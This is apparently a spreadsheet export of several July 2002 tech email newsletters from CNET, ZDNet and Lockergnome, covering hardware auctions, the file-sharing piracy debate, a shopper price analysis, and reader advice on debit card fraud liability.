\n![]([URL]http://auctions.cnet.com[/URL] |    |  **PIII\n733MHz/256MB PC-133/48X  \n64-Bit Sound/8MB 2X AGP/20GB PC**  \n  \nÂ• Starting Bid **$299**  \n![]([URL]http://auctions.cnet.com[/URL]  \n![]([URL]http://auctions.cnet.com[/URL]  \n  \n![]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://auctions.cnet.com[/URL]  \n---  \n![]([URL]http://auctions.cnet.com[/URL] |    |\n**Displaysonic .28mm 17/20/21-inch Multisync Monitors**  \n  \nÂ• All Starting Bids at **$9**\n![]([URL]http://auctions.cnet.com[/URL]  \n![]([URL]http://auctions.cnet.com[/URL]  \n| **Ending Thursday:  \nEnding Friday:  \nEnding Monday:  \nEnding Tuesday:  |  **NEC .28mm 21-inch     Sony .28mm 20-inch  \nSony/Sun .28mm 17-inch  \nSony/Sun 20-inch Multisync  \nSony/SGI 20-inch Trinitron  \n  \n---|---  \n![]([URL]http://auctions.cnet.com[/URL]  \n  \n![]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://auctions.cnet.com[/URL]  \n---  \n![]([URL]http://auctions.cnet.com[/URL] |    |  **Canon\nCanoScan N670U 48-Bit Flatbed Scanner**  \n  \nÂ• Starting Bid **$1**   ![]([URL]http://auctions.cnet.com[/URL]  \n![]([URL]http://auctions.cnet.com[/URL]  \n![]([URL]http://auctions.cnet.com[/URL]  \n![]([URL]http://auctions.cnet.com[/URL]  \n![]([URL]http://auctions.cnet.com[/URL] |    |  **Gateway XP\nP4 1.8GHz/256MB PC-266 DDR  \n40GB 7200RPM/24x10x40 CDRW/16X DVD PC**  \n  \nÂ• Starting Bid **$629**\n![]([URL]http://auctions.cnet.com[/URL]  \n![]([URL]http://auctions.cnet.com[/URL]  \n![]([URL]http://auctions.cnet.com[/URL]  \n![]([URL]http://auctions.cnet.com[/URL]  \n![]([URL]http://auctions.cnet.com[/URL] |    |  **Maxtor 80GB\nATA/100 5400RPM IDE Hard Drive**  \n  \nÂ• Starting Bid **$79**  \n![]([URL]http://auctions.cnet.com[/URL]  \n![]([URL]http://auctions.cnet.com[/URL]  \n![]([URL]http://auctions.cnet.com[/URL]  \n![]([URL]http://auctions.cnet.com[/URL] |    |  **256MB\nPC-2100 Double Data Rate  \n(DDR) 184-Pin (32x64) RAM**  \n  \nÂ• Starting Bid **$60**\n![]([URL]http://auctions.cnet.com[/URL]  \n![]([URL]http://auctions.cnet.com[/URL]  \n![]([URL]http://auctions.cnet.com[/URL]  \n  \n![]([URL]http://www.cnet.com[/URL]  \n![]([URL]http://www.cnet.com[/URL]  \nPlease send all questions, comments, and concerns regarding the CNET Auctions\nNewsletter to auctions@cnet.com and include the Newsletter title in the\nsubject line.\n\n**NOTE:** All product information, including prices, features, and\navailability, is subject to change without notice.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n\nUnsubscribe |  Manage My Subscriptions  | FAQ |  Advertise  \n![]([URL]http://www.c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URL]http://clickthru.online.com[/URL]\n\n</t>
  </si>
  <si>
    <t>http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://a.r.tv.com http://cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://auctions.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.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www.cnet.com http://www.cnet.com http://auctions.cnet.com http://auctions.cnet.com http://auctions.cnet.com http://auctions.cnet.com http://auctions.cnet.com http://www.cnet.com http://www.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auctions.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://a.r.tv.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://clickthru.online.com</t>
  </si>
  <si>
    <t>To: qqqqqqqqqq-cnet-newsletters@example.com\nFrom: "CNET News.com" &lt;Online#3.19785.b8-Opw9lWtyc6p9xsRR.1@newsletter.online.com&gt;\nDate: Thu, 11 Jul 2002 02:22:45 -0700 (PDT)</t>
  </si>
  <si>
    <t>Thu, 11 Jul 2002 02:22:45 -0700 (PDT)</t>
  </si>
  <si>
    <t>"CNET News.com" &lt;Online#3.19785.b8-Opw9lWtyc6p9xsRR.1@newsletter.online.com&gt;</t>
  </si>
  <si>
    <t>CNET NEWS.CONTEXT: Hollywood &amp; Silicon Valley: A way out?</t>
  </si>
  <si>
    <t>![]([URL]http://home.cnet.com[/URL]  \n|  \n  \n|  ![](/b.gif)  \n  **Search**  \n  \n  News.com All CNET     The Web  \n---  \n  \n![Also from\nCNET]([URL]http://home.cnet.com[/URL]  \n**Live tech help NOW!\n\nApril's tech award\n\n1 million open jobs\n\nNews.com: Top CIOs\n\nZDNet: PeopleSoft **  \n---  \n  \n| ![]([URL]http://home.cnet.com[/URL]  \n  \n---  \n![]([URL]http://home.cnet.com[/URL]  \n  \n![]([URL]http://home.cnet.com[/URL]  \n  \n![]([URL]http://home.cnet.com[/URL]  \n  \n![]([URL]http://home.cnet.com[/URL]  \n![]([URL]http://home.cnet.com[/URL] | ![]([URL]http://home.cnet.com[/URL]  \n| ![]([URL]http://home.cnet.com[/URL] |  | ![]([URL]http://home.cnet.com[/URL]  \n|  | ![News.context]([URL]http://home.cnet.com[/URL]  \n| July 11, 2002  \n  \n---|---  \n  \n![]([URL]http://news.cnet.com[/URL]**Hollywood &amp; Silicon\nValley: A way out?**\n\nThe controversy over digital file swapping is no closer to an amicable\nresolution than it was when peer-to-peer technology first came into vogue.\n\nCharlie Cooper, Executive Editor/Commentary  \n  \n![]([URL]http://home.cnet.com[/URL]  \n  \n![]([URL]http://home.cnet.com[/URL]  \n---  \n**Just desserts for scofflaws**  \nU.S. Rep. **Howard L. Berman** weighed in this week, arguing that piracy over\nP2P networks robs songwriters on a massive scale. The congressman from\nHollywood has authored a bill to stop illegal digital downloads by giving\ncopyright owners the ability to technologically impair the distribution of\ncopyrighted works.  \n**Read Full Story** ![]([URL]http://home.cnet.com[/URL]\n\n**Spotting a scam in sheep's clothing**  \nBerman's proposal received a cool reception in Silicon Valley, where rules are\nfrowned upon and unfettered innovation reigns supreme. So it was that\nStreamCast CEO **Steve Griffin** spoke for many in the community when he wrote\nthat Berman's proposal won't work. What's more, he wondered, was Berman really\nconcerned about controlling piracy, or could the congressman from Hollywood be\ninfluenced by certain constituents? Conspiracy buffs this week had a field\nday.  \n**Read Full Story** ![]([URL]http://home.cnet.com[/URL]\n\n**How to curb digital piracy**  \nThe odds that either side will raise the white flag are slim. But must this\ndebate necessarily turn into an endless donnybrook? Former White House staffer\n**Jonathan Greenblatt** doesn't buy into historical determinism, and believes\nHollywood can respond to the challenge of new media. First, it must shy away\nfrom any legislation that aims to control technology or enforces any\n"draconian" digital rights management rules. What other suggestions does he\noffer? Read on.  \n**Read Full Story** ![]([URL]http://home.cnet.com[/URL]\n\n  \n**Writing file sharing's final chapter**  \nAll this occurs as the P2P community lost one of its brighter lights. Computer\nscientist and entrepreneur **Gene Kan** died June 29. Kan, who helped to\ndevelop an early open-source version of Gnutella software, wrote a column for\nCNET News.com on June 21, drawing on the lessons learned from the history of\npeer-to-peer technology. In this highly nuanced piece, Kan offers a timely\nwarning about what can happen when people get overly excited about new\ntechnologies.  \n**Read Full Story** ![]([URL]http://home.cnet.com[/URL]\n\n**CEOs: Are you too focused?**  \nConventional wisdom has it that "focus" is de rigueur for any corporation\nhoping to achieve superior performance. The flip side of this argument is that\nmarkets are quick to discount the valuations of diversified companies because\nof perceived shortcomings. But researchers at McKinsey offer an alternative\nidea, suggesting that there's a particularly fertile middle ground between\nfocus and diversification.  \n**Read Full Story** ![]([URL]http://home.cnet.com[/URL]  \n---  \n![]([URL]http://home.cnet.com[/URL] | ![]([URL]http://home.cnet.com[/URL] |\n![]([URL]http://home.cnet.com[/URL] |  \n  \n| ![]([URL]http://home.cnet.com[/URL]  \n| ![]([URL]http://home.cnet.com[/URL]  \n---|---|---|---|---|---  \n![]([URL]http://www.cnet.com[/URL] | ![]([URL]http://www.cnet.com[/URL] |\n![]([URL]http://www.cnet.com[/URL] | ![]([URL]http://www.cnet.com[/URL] |\n![]([URL]http://www.cnet.com[/URL]  \n---|---|---|---|---  \n![]([URL]http://www.cnet.com[/URL] | ![]([URL]http://www.cnet.com[/URL] |\n![]([URL]http://www.cnet.com[/URL] | ![]([URL]http://www.cnet.com[/URL] |\n![]([URL]http://www.cnet.com[/URL]  \n![Sign up for more free newsletters from\nCNET!]([URL]http://a.r.tv.com[/URL]  \nThe e-mail address for your subscription is qqqqqqqqqq-cnet-\nnewsletters@example.com  \nUnsubscribe | Manage My Subscriptions | FAQ | Advertise\n\nPlease send any questions, comments, or concerns to dispatchfeedback@news.com.  \n![]([URL]http://www.zdnet.com[/URL] | ![]([URL]http://www.cnet.com[/URL] |\n![]([URL]http://www.cnet.com[/URL]  \n---|---|---|---|---|---|---  \n![]([URL]http://www.cnet.com[/URL] | ![]([URL]http://www.cnet.com[/URL] |\n![]([URL]http://www.cnet.com[/URL]  \n---|---|---  \n![]([URL]http://www.cnet.com[/URL] | ![]([URL]http://www.cnet.com[/URL] |\n![]([URL]http://www.cnet.com[/URL] |  Price comparisons | Product reviews\n| Tech news | Downloads | All CNET services | ![]([URL]http://www.cnet.com[/URL]  \n---|---|---|---|---  \n![]([URL]http://www.cnet.com[/URL]  \n---  \n|\n\n  \n**Copyright 2002 CNET Networks, Inc. All rights reserved.**\n\n|\n\n![](http://gserv-\ncnet.zdnet.com/clear/outbound.gif?APPID=2&amp;EMID=25136487&amp;NL=e432&amp;ISSUE=2002-07-11)  \n  \n---|---  \n![]([URL]http://clickthru.online.com[/URL]\n\n</t>
  </si>
  <si>
    <t>http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://news.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://home.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://a.r.tv.com http://www.zdnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://www.cnet.com http://clickthru.online.com</t>
  </si>
  <si>
    <t>To: qqqqqqqqqq-zdnet@example.com\nFrom: ZDNet Delivers &lt;Online#3.19699.f7-cwsBl8-Kok0ajsRR.1@newsletter.online.com&gt;\nDate: Thu, 11 Jul 2002 02:05:18 -0700 (PDT)</t>
  </si>
  <si>
    <t>Thu, 11 Jul 2002 02:05:18 -0700 (PDT)</t>
  </si>
  <si>
    <t>ZDNet Delivers &lt;Online#3.19699.f7-cwsBl8-Kok0ajsRR.1@newsletter.online.com&gt;</t>
  </si>
  <si>
    <t>Shop smarter with ZDNet's price-feature analysis</t>
  </si>
  <si>
    <t>--2063203.1026378321083.JavaMail.root.abv-sfo1-ac-agent1 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit -----------------------------------------------------------------     ZDNET DELIVERS Price-Feature Analysis	Vol 1, No. 2 ----------------------------------------------------------------- This week, we present a special shopper report featuring four cool products. We have reviewed these products, compared each to five products with similar features, and analyzed the range of prices for each category. What you'll see is a shopper tool we've dubbed the "Price-Feature Ratio Analysis." Featured products can fall in to three stages of Price-Feature ratios: Stage 1: High Price-Feature Ratio - Technophiles will rush to buy the product, but can expect to pay higher prices for the honor of being the first among their friends to have one. Stage 2: Variable Price-Feature Ratio - Expect high variability in prices among products with similar features. It pays to comparison shop for the best price. Stage 3: Low Price-Feature Ratio - When compared to products with similar features, prices are low and don't vary much from merchant to merchant. Use our merchant ratings to find the right one for you. We have rated each of the products featured in this supplement to aid your shopping experience. ______________________________________________________________ Featured Products 1) Sound Blaster Extigy 2) Handspring Treo 90 3) KDS Rad-5 15-inch LCD 4) Sony PlayStation 2 ______________________________________________________________ Sound Blaster Extigy sound convergence device The Lowdown: If you're into watching DVDs, listening to tunes, or recording music with your computer, you'd be doing yourself a favor by upgrading your sound with this convergence device. Read review: -- [URL]http://chkpt.zdnet.com[/URL],12069,554219,00.html Price-Feature Ratio Analysis: This product is in Stage 2: Variable Price-Feature Ratio. You can expect high variability in prices among products with similar features. It pays to comparison shop for the best price. Check prices: -- [URL]http://zdnetshopper.cnet.com[/URL] ______________________________________________________________ Handspring Treo 90 PDA The Lowdown: If you're not fond of Graffiti, this is an excellent alternative to other Palm OS handhelds. Read review: -- [URL]http://chkpt.zdnet.com[/URL],12069,561635,00.html Price-Feature Ratio Analysis: This product is in Stage 1: High Price-Feature Ratio Technophiles will rush to buy the product, but can expect to pay higher prices for the honor of being the first among their friends to have one. Check prices: -- [URL]http://zdnetshopper.cnet.com[/URL] ______________________________________________________________ KDS Rad-5 15-inch LCD The Lowdown: Without our even hitting the power button, the stylish KDS Radius Rad-5 stands out from the pack with its silver casing and blue highlights. Turn on this basic, analog-only LCD and you'll see an equally impressive image at its native resolution of 1,024x768. Read review: -- [URL]http://chkpt.zdnet.com[/URL],12069,519801,00.html Price-Feature Ratio Analysis: This product is in Stage 2: Variable Price-Feature Ratio. You can expect high variability in prices among products with similar features. It pays to comparison shop for the best price. Check prices: -- [URL]http://zdnetshopper.cnet.com[/URL] ______________________________________________________________ Sony PlayStation 2 The Lowdown: The elder statesman of next-generation consoles, the PS2, now priced below $200, has the luxury of a year's head start and many solid games. Read review: -- [URL]http://chkpt.zdnet.com[/URL],12069,133000,00.html Price-Feature Ratio Analysis: This product is at Stage 3: Low Price-Feature Ratio. When compared to products with similar features, prices are low and don't vary much from merchant to merchant. Use our merchant ratings to find the right one for you. Check prices: -- [URL]http://zdnetshopper.cnet.com[/URL] ************************************************************* The e-mail address for your subscription is qqqqqqqqqq-zdnet@example.com To sign up for more ZDNet newsletters, click here: NOTRACK [URL]http://nl.com.com[/URL] To unsubscribe, click here: [URL]http://clickthru.online.com[/URL] To receive your newsletter in HTML format, click here: NOTRACK [URL]http://nl.com.com[/URL] For the ZDNet Newsletters FAQ, click here: [URL]http://www.zdnet.com[/URL] To learn about advertising opportunities in ZDNet Newsletters, click here: [URL]http://www.cnet.com[/URL] --2063203.1026378321083.JavaMail.root.abv-sfo1-ac-agent1 Content-Type: text/html; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit subj: Shop smarter with ZDNet's price-feature analysis ZDNet Delivers The Lowdown:  If you're into watching DVDs, listening to tunes, or recording music with your computer, you'd be doing yourself a favor by upgrading your sound with this convergence device.  				Read Review Â Check Latest Prices J&amp;R Music and Computer $150 buy.com $127 Gateway $134 Â  Check Prices Â Price-Feature Ratio Analysis Stage 2: Variable Price-Feature RatioExpect high variability in prices among products with similar features. It pays to comparison shop for the best price. The Lowdown: If you're not fond of Graffiti, this is an excellent alternative to other Palm OS handhelds.  				Read Review Â Check Latest Prices PC Connection $299 Handspring $299 CDW $299 Â  Check Prices Â Price-Feature Ratio Analysis Stage 1: High Price-Feature Ratio Technophiles will rush to buy the product, but can expect to pay higher prices for the honor of being the first among their friends to have one.  The Lowdown: Without our even hitting the power button, the stylish KDS Radius Rad-5 stands out from the pack with its silver casing and blue highlights. Turn on this basic, analog-only LCD and you'll see an equally impressive image at its native resolution of 1,024x768.  				Read Review Â Check Latest Prices CDW $383 buy.com $353 Gateway $375 Â  Check Prices Â Price-Feature Ratio Analysis Stage 2: Variable Price-Feature RatioExpect high variability in prices among products with similar features. It pays to comparison shop for the best price. The Lowdown: The elder statesman of next-generation consoles, the PS2, now priced below $200, has the luxury of a year's head start and many solid games. 				Read Review Â Check Latest Prices J&amp;R Music and Computer $199 PC Connection $199 Â  Check Prices Â Price-Feature Ratio Analysis Stage 3: Low Price-Feature RatioWhen compared to products with similar features, prices are low and don't vary much from merchant to merchant. Use our merchant ratings to find the right one for you. Sign up for more free newsletters from ZDNet The e-mail address for your subscription isÂ qqqqqqqqqq-zdnet@example.com UnsubscribeÂ |          Â Manage          My SubscriptionsÂ |Â FAQÂ |          Â Advertise Home |eBusiness | Security | Networking | Applications | Platforms | Hardware | Careers --2063203.1026378321083.JavaMail.root.abv-sfo1-ac-agent1--</t>
  </si>
  <si>
    <t>http://chkpt.zdnet.com http://zdnetshopper.cnet.com http://chkpt.zdnet.com http://zdnetshopper.cnet.com http://chkpt.zdnet.com http://zdnetshopper.cnet.com http://chkpt.zdnet.com http://zdnetshopper.cnet.com http://nl.com.com http://clickthru.online.com http://nl.com.com http://www.zdnet.com http://www.cnet.com</t>
  </si>
  <si>
    <t>To: qqqqqqqqqq-lg@example.com\nFrom: Lockergnome Windows Daily &lt;subscriptions@lockergnome.com&gt;\nDate: Thu, 11 Jul 2002 00:09:04 -0500</t>
  </si>
  <si>
    <t>Thu, 11 Jul 2002 00:09:04 -0500</t>
  </si>
  <si>
    <t>[Lockergnome Windows Daily]  Fraud Wipes</t>
  </si>
  <si>
    <t>![Lockergnome]([URL]http://images.lockergnome.com[/URL] ![See You\nat Gnomedex\n2002!]([URL]http://www.lockergnome.com[/URL]  \n  \n---  \n|\n\n  07.11.2002 GnomeREPORT  \n  \n---  \n  \n**GET HIGH-SPEED ACCESS:** Verizon Online DSL is an affordable, high-speed\nInternet connection. Click here to see if Verizon Online DSL is available in\nyour area. ![]([URL]http://www.qksrv.net[/URL]  \n---  \n  \nI'm not a banker, and I'm not a credit expert - but these people speak from\npersonal and professional experience. Draw your own conclusions. Lockergnomie\nSang Vo writes: "Though you may have zero liability for a fraudulent\ntransaction, the paperwork and red tape to work through if someone empties out\nall your funds can leave you hurting for a while. There are many credit cards\nthat now offer zero liability for fraudulent transactions. So, contact your\ncredit card provider / bank to see if you can have such a plan added to your\ncard or if you can apply for one that does." And Russ Coover continues: "If\nyou purchase something with a credit card, and you later decide to dispute the\npurchase (for a reason such as the product was faulty and the merchant refuses\nto replace it or, perhaps the product was never delivered), you can legally\ndispute the charge with your credit card company. However, if you use a debit\ncard to make that purchase, you have no right to dispute the charge."\n\nJeff Morgan has a different interpretation of the regulation in question (E):\n"In 12 CFR II, Section 205.6, it's saying that if you give your financial\ninstitution timely notice of the theft of your card or PIN code (two business\ndays), you are liable for no more than $50, otherwise you may be liable for up\nto $500." And Tim Miller extends the translation: "If someone puts a false\ncharge on a credit card, the worse that will happen is your liability for $50,\nwith the possibility that your next charge might not go through because the\nthief used all of your available balance. If a false charge goes against your\ndebit card and wipes out your bank balance, however, outstanding checks can\nbounce. Your bank may be able to get you all of your money back, but the\npayees of those bounced checks might sock you with $20-25 insufficient fund\nfees - and they are under no obligation to waive those fees. If you have 5\nchecks outstanding, you could be out over $100."\n\nFrank Reyes was apparently lucky: "Someone recently obtained my debit card\nnumber through a local grocery store. I was told by the checker at the grocery\nstore that the card readers would only accept Visa cards not ATM cards. I was\nvery suspicious, and used my debit card instead. Apparently, the store's\ncomputer had been hacked, and my debit card number and name (among several\nothers)were forwarded to an unscrupulous individual. I was reviewing my\nchecking account online two days later, and noticed an unauthorized charge\nagainst my account ($60.00). I contacted the vendor that had charged my\naccount and informed them of the fraudulent charge. The vendor stopped the\nshipment, provided the shipping address to my bank, and credited my account\nwithin 5 days after I informed them (The delay in the fund reversal was due to\nthe 4th of July weekend). The only negative aspect is the fact that I had to\nrequest a new debit card, which has yet to arrive."\n\nFurther thoughts from Lockergnomie James Simbro: "I'm not totally sure on\nthis, but I've been warned against using a debit card for online purchases.\nYes, you may not be liable for any of the false charges on a debit card (in\nthe end), but in the meantime (during your dispute) the money will be withheld\nfrom your account and you will not have access to it. However with a credit\ncard, you are not responsible for funds that are in dispute. The scenario I\nwas given, was imagine if somebody falsely used your debit card and cleaned\nout your checking account? The money is gone! False charges on a credit card\nare not "real money" until somebody has to pay them. I would guess that each\nbank has different policies for debit card fraud. I might just have to call\nmine and see what I'd face." In short, be careful - no matter what you use or\nwhere you choose to use your plastic.\n\nSee You in August,  \nChris Pirillo  \n\n  \n\n GnomeDOWNLOADS  \n  \n---  \n  \n**CYG v20020115 [3.2M] W9x/2k/XP FREE**\n\n[URL]http://www.geocities.com[/URL]\n\n{Manage your collections} It seems like everyone collects something. In fact,\njust the other day I decided to start collecting dust. It's much easier than\ncollecting stamps. If you do collect stamps, though, this organizer will help\nyou keep track of them all. Or you can use it to keep track of your Star Wars\ntrading card collection, or your coin collection, or your [insert collection\nhere] collection. It works for everything, get it? It's also great for\nmanaging your MP3 lists, including ID3 tag editing. "CYG is founded on an\nobject-oriented database approach, and carefully programmed with one goal in\nmind: universal usage."\n\n  \n**DriverManager v1.0 [557k] 2k/XP FREE**\n\n[URL]http://www.l5sg.com[/URL]\n\n{Drive your drivers} Everyone else step outside while I have a talk with the\npower geeks. If you're running on NT, 2000, or XP and need to know what\ndrivers you have running on your system, this program can show you. That's not\ntoo shabby, but of course, you can also change or even get rid of certain\ndrivers if you desire. And that's, um, even more not too shabby. And that\nRefresh button is there to make sure you're seeing everything exactly how you\nwant it. "DriverManager is a tool designed to allow System Administrators,\nPower Users and Driver Developers an easy means to view, modify or remove\ndrivers and their information."\n\nRecommend It!\n\n  \n\n GnomeCLICKS  \n  \n---  \n  \n![TECHNOLOGY can be frustrating for new and intermediate computer users, UNTIL\nNOW. Join us for a FREE Windows Newsletter, video tutorials, articles, special\nreports, and\nmore!]([URL]http://www.lockergnome.com[/URL] | ![The\neasiest way to Zip/UnZip. An AWARD-WINNING file compression utility featuring\nquick backup, batch processing, Windows integration and SUPPORTS 15 archive\nformats \(ACE, RAR, etc\).]([URL]http://www.picozip.com[/URL] |\n![Handy Backup]([URL]http://www.lockergnome.com[/URL] |\n![Secure your\nE-Mail!]([URL]http://www.lockergnome.com[/URL] |\n![Shortcut to\nRDesk.exe]([URL]http://www.capitalintellect.net[/URL] |\n![IPCheck Server Monitor monitors a network using various protocols \(e.g.\nping, http, smtp, ftp\) and notifies the staff in various ways as soon as an\noutage occurs.]([URL]http://www.lockergnome.com[/URL] |\n![Share your team/project contacts, calendars, tasks, etc. in MS Oulook 2002,\nwithout a\nserver!]([URL]http://www.lockergnome.com[/URL]  \n---|---|---|---|---|---|---  \n  \n  \n\n GnomeSYSTEM  \n  \n---  \n  \n**Transloader**\n\n[URL]http://www.transloader.com[/URL]\n\n"This site makes it easy to transfer files to your Web server. Mostly it is\nuseful for sites like FlamingText.com and ImageBot.com to send generated\nimages to another server (such as your Web or FTP server). This is\nparticularly useful for WebTV users who can't save images on their own\nmachine. Although we have no pre-set limits (okay, it's 2.4 GB), the transfers\nthat you do through Transloader.com must be completed in five minutes. This\nserver is capable of transferring over 1 Gig per minute; if you are talking to\na slow server, your job may not complete in time. Other transloaders sometimes\nsuffer from overloading (too many people using them), which is why I wrote\nthis one. Hopefully, this will never happen to us, but in any case, check\nthese others out, they have some nice services..."\n\nRecommend It!\n\n  \n\n GnomeWILDCARD  \n  \n---  \n  \n|  | **Full PDF Books**  \n---  \nPoor Richard's Web  \nInternet Promotions  \nE-Mail Publishing  \nWeb Site Makeover  \nWebsites Made Easy  \nOnline Communities  \nHome Networking  \nInternet Recruiting  \nOnline Branding  \n  \n**To Share or Not to Share**  \nScribbled by Lee Smith\n\nI think that online file sharing is dependent on the file that is being\nshared. If the song is a current release or recent, then I do not believe in\nit. I can't consider it stealing because you can't steal from someone who\nwillingly puts the file up for downloading. Those who did put the file online\nmost likely feel that it is also not stealing, since they purchased the CD.\nHowever, I do not agree with RIAA or recording companies who are attempting to\nmake their CDs "rip proof" either. I do not feel they have the right to\ndictate what songs I can listen to or when or in what order. I like to rip\nspecific songs from CDs then make my own CD, which either goes down to my\nentertainment system or to my truck. The master CD is saved and rarely played\n("why" is explained later in this message). I prefer making my own CDs for my\ntruck because if my truck were to be broken into and my CDs stolen, it would\nbe much easier to replace a self-burned CD than a master. Sometimes, masters\ncannot be replaced without a large expense, if at all.\n\nIf the song is outdated, an oldie (so to speak), and is not available\nanywhere, then yes, I do believe in it. Or, if the song being sought is wanted\nto rejuvenate one's collection, then yes, I do believe in that, too. Case in\npoint: as a kid, I collected a lot of 45s and record albums. I have more than\n4,000 records in my collection. Many were played so much that they are not\nplayable anymore and, even though I did take care of them, due to the cheap\nstereos and record players in the 60s, they are 'shot.' I want to relive some\nof my younger days through music, but attempting to convert those records (to\ndigital) is next to impossible for me. So, in this instance, no, I do not\nthink it is illegal to seek out digitalized copies of the old songs that I\nalready have records of (albums and/or 45s). If, however, the song(s) that I\nam seeking are available on CD, then I will be very quick to purchase that CD\nfrom Tower Records, The Warehouse, or any other reputable dealer.\n\nFor those that are impossible to find "digitals" for, then, one day, perhaps I\nwill reach a point with technology (and money) where I can transfer those\nplatters to WAV and they will sound as good as when they were originally\nrecorded. I have been lucky enough to find some on CD thanks to the Internet;\nI was quick to purchase the disc, usually from the original artists\nthemselves. Some of the music that I have, sadly, will never be heard again. I\nblame RIAA and the recording industry for that, too. Neither seem to care\nabout the "lost" songs when digitally remastered CDs are released.\n\nSubmit Your Thoughts | Recommend It!\n\n![TechTV's Computer\nBasics]([URL]http://www.lockergnome.com[/URL]\n**CHRIS TEACHES THE BASICS:** If you've got friends or family who want to\nlearn more about their PC, from a guy who makes things nice and easy, check\nout the VHS release of Computer Basics in the GnomeStore. Chris teams with\nTechTV cohort, Kate Botello, to lead novices on a journey through their\ncomputer. From basic interactions, to installing apps, to using the Internet\nand e-mail, Chris and Kate have all the basics covered. Help out a friend and\nget them a copy today.  \n---  \n  \n  \n\n GnomeFAVORITE  \n  \n---  \n  \n**Pixel Decor**\n\n[URL]http://www.pixeldecor.com[/URL]\n\n{Patterns for your screen} *yawn* Your desktop is more boring than I don't\nknow what. Unfortunately, I, personally, can't help you out. Don't fret,\nthough, cause Jen is here to provide you with some truly amazing desktop\nimages, icons, and even calendars. She's got a very unique and creative style\nthat you may enjoy. Oh, and did I mention she was a professional designer?\nThat's right; now you know it's all good. The best part? All these images are\nFREE. The "Buzzz" tile is especially awesome (and this endorsement is even\ncoming from the guy who hates creepy-crawlies of all kinds).\n\nRecommend It!\n\n  \n\n GnomeTIP  \n  \n---  \n  \n|  | **Help Yourself**  \n---  \nMicrosoft Office Tips  \nPC Productivity Tips  \nCool Internet Tips  \nWindows 2000 Tips  \nWindows XP Tips  \nTop 50 Fun Sites  \nMust-Know Terms  \nTop 50 Useful Sites  \nTop 75 Tech Sites  \n  \nWho can save you from making a small oversight with your digital video camera\npurchase? Lockergnomie Frank Kenna: "I see that you're thinking of getting a\nDV camera. I got one about a month ago, and I made one mistake: I didn't get\none with A/V INPUTS. Mine has A/V outputs, which are great for getting your\ndigital stuff out onto VHS, etc. But without the inputs, there's no way to get\nVHS or old 8mm footage into the camera. With inputs, not only can you get your\nold 8mm &amp; VHS stuff onto DV tapes, but you can use the camera as a pass-\nthrough device and get the old stuff directly onto your computer for editing\npurposes. I wish someone had made clear the advantages and importance of\ninputs when I bought my DV camcorder. The reviews and magazines I read barely\nmentioned this feature - and nobody stressed its importance. But if you're\ngoing to be doing any editing, it is critical (if you want to work on any of\nyour old stuff). Don't make the same mistake I did - make SURE you get this\nfeature. It doesn't seem to impact the price of the cameras; some offer it and\nsome don't." This advice came not a moment too soon for me. Thank you for\nhelping us, Frank!\n\nRecommend It!\n\n  \n\n|  [URL]http://www.lockergnome.com[/URL]\n\nYour subscribed e-mail address is: [qqqqqqqqqq-lg@example.com] - To\nunsubscribe or change your delivery address, please visit the subscription\nmanagement page. For further information, please refer to the GnomeCREDITS in\nthe sidebar.  \n---  \n  \n|\n\nLOOK OVER HERE  \n  \n---  \n  \n Download Our Tip Files  \n\n Latest Windows Daily  \n Latest Digital Media  \n Latest Tech Specialist  \n Latest Penguin Shell  \n Latest Apple Core  \n Latest Web Weekly  \n Latest Bits &amp; Bytes  \n Latest Audio Show  \n\n Low Price Search  \n $99 Tech Conference  \n\n![See You in\nAugust!]([URL]http://chris.pirillo.com[/URL]\n\n The GnomeSTORE  \n Tell a Friend About Us!  \n Suggest a Feature  \n Advertise With Us  \n High-Tech Job Search  \n Chat With Gnomies  \n Watch The Webcams  \n Computer Power User  \n\n Read Past Issues  \n Download X-Setup  \n About Lockergnome  \n Our Privacy Policy  \n View More Options  \n Our XML / RSS Feed  \n Syndicate Our Tips  \n Link To Lockergnome  \n Get Chris's Book  \n\n General Feedback  \n E-mail the Editor  \n The Editor's Blog  \n\n\n\nMP3 SOFTWARE  \n  \n---  \n  \nHavas MP3 Pro  \nMagix MP3 Maker  \nEjay MP3  \nAudiostation 5.0  \nJack The MP3 Ripper  \nPearson MP3 Maker  \nSteinberg My MP3  \nMusicMatch Jukebox 7.0  \nHip Hop E-jay Record  \nMP3-Wolf  \nMP3 Maker Gold  \nThe MP3 Wizard  \n\n\n\nGNOMESPECIALS  \n  \n---  \n  \n Manage Your Workgroup  \n Form Pilot  \n Say the Time 5.0  \n Boomer - Stream Now  \n Create Web/CD catalog  \n Easy Web Editor  \n Kleptomania  \n 